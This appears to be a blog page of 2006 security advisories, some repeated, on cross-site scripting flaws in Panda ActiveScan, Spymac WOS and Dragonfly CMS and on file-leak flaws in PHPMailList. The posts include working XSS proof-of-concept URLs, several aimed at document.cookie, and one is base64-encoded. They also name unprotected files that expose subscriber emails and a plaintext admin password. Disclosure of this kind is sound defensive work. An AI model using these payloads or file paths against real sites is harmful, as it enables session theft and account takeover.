################################################
Panda ActiveScan XSS vulnerability
Vendor urL:http://www.pandasoftware.es or .com
Advisore:http://lostmon.blogspot.com/2006/08/
panda-activescan-xss-vulnerability.html
vendor notify:yes exploit available:yes
OSVDB ID:29147
Securitytracker:1016696
BID:19471
################################################
Panda ActiveScan contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'email' variable upon submission to the ascan_6.asp
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading
to a loss of integrity.
##########
versions:
##########
Panda ActiveScan 5.53.00
##########
Solution:
##########
Panda has release a new version of ActiveScan
at 14-08-2006
#########
timeline:
#########
discovered : 01-08-2006
vendor notify :05-08-2006
vendor response :14-08-2006
vendor fix:14-08-2006
disclosure:9-08-2005
################
test
################
http://www.pandasoftware.com/activescan/activescan/
ascan_6.asp?IdLang=2&Idvendor=17490&Idpais=63&email=
Lostmon@gmail.com%22%3E%3Cscript%3Ealert%28%27XSS%20
Vulnerability%27%29%3C/script%3E%26&pais=62&
provincia=9&tipousuario=0&enviar=1&ode=0#
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Vulnerabilities in PHPMailList 1.8.0
Wednesday, July 05, 2006
########################################################
Multiple Vulnerabilities in PHPMailList 1.8.0
Vendor url: http://php.warpedweb.net/
Advisore:http://lostmon.blogspot.com/2006/07/
multiple-vulnerabilities-in.html
VEndor notify:yes Explotation include:yes
osvdb id:27016,27017,27018
Securitytracker:1016439
BID:18840
FrSIRT: FrSIRT/ADV-2006-2690
########################################################
################
Description
################
PHPMailList is a powerful, yet simple to use, email announcement script.
It allows people to subscribe/unsubscribe through a web-based form,
checking for valid addresses.The web-based administration module allows
the owner to send messages to the list, subscribe/unsubscribe people,
view the list of subscriber, and configure the script.Installation is
simple, and configuration of confirmation messages, welcome messages
and goodbye messages, as well as signatures are all maintained through
the password protected administration section.
PHPMailList have multiple vulnerabilities like XSS. information disclosure
Plain text administrator username/password disclosure.
##############
versions
##############
PHPMaiLlist 1.8.0 and prior versions
#####################
Cross site scripting
#####################
PHPMailList have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate poperly the
input parsed in the email field upon submission to '/maillist.php'
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
######################
Information disclosure
######################
direct request to file 'list.dat' reveal all email address of all suscribers.
Direct request to file 'ml_config.dat' reveal all configuration information.
#####################################
Plain text administrator disclosure:
#####################################
Direct request to file 'ml_config.dat' reveal in the first line
the admin username and in the second the admin password in plain text
######################
Timeline
######################
Discovered: 06-jun-2006
Vendor notify:No have a forum and no have a mail address...
vendor response:-------
Disclosure:06-jul-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Vulnerabilities in PHPMailList 1.8.0
Vendor url: http://php.warpedweb.net/
Advisore:http://lostmon.blogspot.com/2006/07/
multiple-vulnerabilities-in.html
VEndor notify:yes Explotation include:yes
osvdb id:27016,27017,27018
Securitytracker:1016439
BID:18840
FrSIRT: FrSIRT/ADV-2006-2690
########################################################
################
Description
################
PHPMailList is a powerful, yet simple to use, email announcement script.
It allows people to subscribe/unsubscribe through a web-based form,
checking for valid addresses.The web-based administration module allows
the owner to send messages to the list, subscribe/unsubscribe people,
view the list of subscriber, and configure the script.Installation is
simple, and configuration of confirmation messages, welcome messages
and goodbye messages, as well as signatures are all maintained through
the password protected administration section.
PHPMailList have multiple vulnerabilities like XSS. information disclosure
Plain text administrator username/password disclosure.
##############
versions
##############
PHPMaiLlist 1.8.0 and prior versions
#####################
Cross site scripting
#####################
PHPMailList have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate poperly the
input parsed in the email field upon submission to '/maillist.php'
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
######################
Information disclosure
######################
direct request to file 'list.dat' reveal all email address of all suscribers.
Direct request to file 'ml_config.dat' reveal all configuration information.
#####################################
Plain text administrator disclosure:
#####################################
Direct request to file 'ml_config.dat' reveal in the first line
the admin username and in the second the admin password in plain text
######################
Timeline
######################
Discovered: 06-jun-2006
Vendor notify:No have a forum and no have a mail address...
vendor response:-------
Disclosure:06-jul-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in Spymac WOS V
Wednesday, May 17, 2006
##########################################################
Multiple Cross site scripting in Spymac WOS V
Vendor url: http://www.spymac.com
Advisore:http://lostmon.blogspot.com/2006/05/
multiple-cross-site-scripting-in.html
Vendor notify: yes Exploit available: yes
OSVDB ID:25925,25926,25927,
Securitytracker:1016116
FrSIRT/ADV-2006-1852
##########################################################
Spymac WOS is powered by an integrated collection of Web
and desktop applications that together form "Spymac WOS".
Developed in-house, Spymac WOS is an intelligent environment
featuring patent-pending technology that allows for the creation
of an immersive and visually-stunning Web experience.
Spymac have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
#######################
Versions
#######################
Spymac WOS V
########################
Solution:
########################
No solution was available at this time.
########################
Examples
########################
for view some examples... need a client login.
http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]
http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]
http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]
http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]
http://[VICTIM]/login.php?[XSS-CODE]
some others variables are subsceptibles to the same flaw.
########################
TIMELINE
########################
Discovered:02-05-2006
Vendor notify:14-05-2006
Vendor response:-------------
Disclosure:17-05-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in Spymac WOS V
Vendor url: http://www.spymac.com
Advisore:http://lostmon.blogspot.com/2006/05/
multiple-cross-site-scripting-in.html
Vendor notify: yes Exploit available: yes
OSVDB ID:25925,25926,25927,
Securitytracker:1016116
FrSIRT/ADV-2006-1852
##########################################################
Spymac WOS is powered by an integrated collection of Web
and desktop applications that together form "Spymac WOS".
Developed in-house, Spymac WOS is an intelligent environment
featuring patent-pending technology that allows for the creation
of an immersive and visually-stunning Web experience.
Spymac have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
#######################
Versions
#######################
Spymac WOS V
########################
Solution:
########################
No solution was available at this time.
########################
Examples
########################
for view some examples... need a client login.
http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]
http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]
http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]
http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]
http://[VICTIM]/login.php?[XSS-CODE]
some others variables are subsceptibles to the same flaw.
########################
TIMELINE
########################
Discovered:02-05-2006
Vendor notify:14-05-2006
Vendor response:-------------
Disclosure:17-05-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in dragonflycms
Wednesday, February 22, 2006
######################################################
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisore: http://lostmon.blogspot.com/2006/02/
multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################
Description:
"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."
CPG Dragonfly is vulnerable to cross site scripting that
allow attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.
######################
Versions
######################
prior to Dragonfly 9.0.6.1
#########################
Solution
########################
No solution was available at this time.
##########################
Timeline
##########################
discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006
#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh"><script>alert(document.cookie)
</script>
http://[Victim]/index.php?name=Your_Account&error=1
"><script>alert(document.cookie)</script>
&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3
"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
base64 cross site scripting , the XSS code are encoded in base64.
the username field are vulnerable too
insert in the box <script>alert()</script>
and this code is executed...
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://[Victim]/index.php?name=News&file=submit
// texareas 'Story Text' and Extended text are vulnerables.
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11"><script>alert()</script>
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005"><script>alert()</script>
>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all
"><script>alert()</script>
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert
(document.cookie)</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled"><script>alert()</script>
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results
"><script>alert()</script>pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5
"><script>alert()</script>
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta=">
<script>alert()</script>
topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
"><script>alert()</script>
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
"><script>alert()</script>
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
if we insert in the search box this code "><script>alert()</script>
this is executed wen we click in Search button.
####################### €nd ############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisore: http://lostmon.blogspot.com/2006/02/
multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################
Description:
"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."
CPG Dragonfly is vulnerable to cross site scripting that
allow attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.
######################
Versions
######################
prior to Dragonfly 9.0.6.1
#########################
Solution
########################
No solution was available at this time.
##########################
Timeline
##########################
discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006
#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh"><script>alert(document.cookie)
</script>
http://[Victim]/index.php?name=Your_Account&error=1
"><script>alert(document.cookie)</script>
&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3
"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
base64 cross site scripting , the XSS code are encoded in base64.
the username field are vulnerable too
insert in the box <script>alert()</script>
and this code is executed...
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://[Victim]/index.php?name=News&file=submit
// texareas 'Story Text' and Extended text are vulnerables.
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11"><script>alert()</script>
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005"><script>alert()</script>
>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all
"><script>alert()</script>
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert
(document.cookie)</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled"><script>alert()</script>
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results
"><script>alert()</script>pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5
"><script>alert()</script>
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta=">
<script>alert()</script>
topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
"><script>alert()</script>
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
"><script>alert()</script>
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
if we insert in the search box this code "><script>alert()</script>
this is executed wen we click in Search button.
####################### €nd ############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)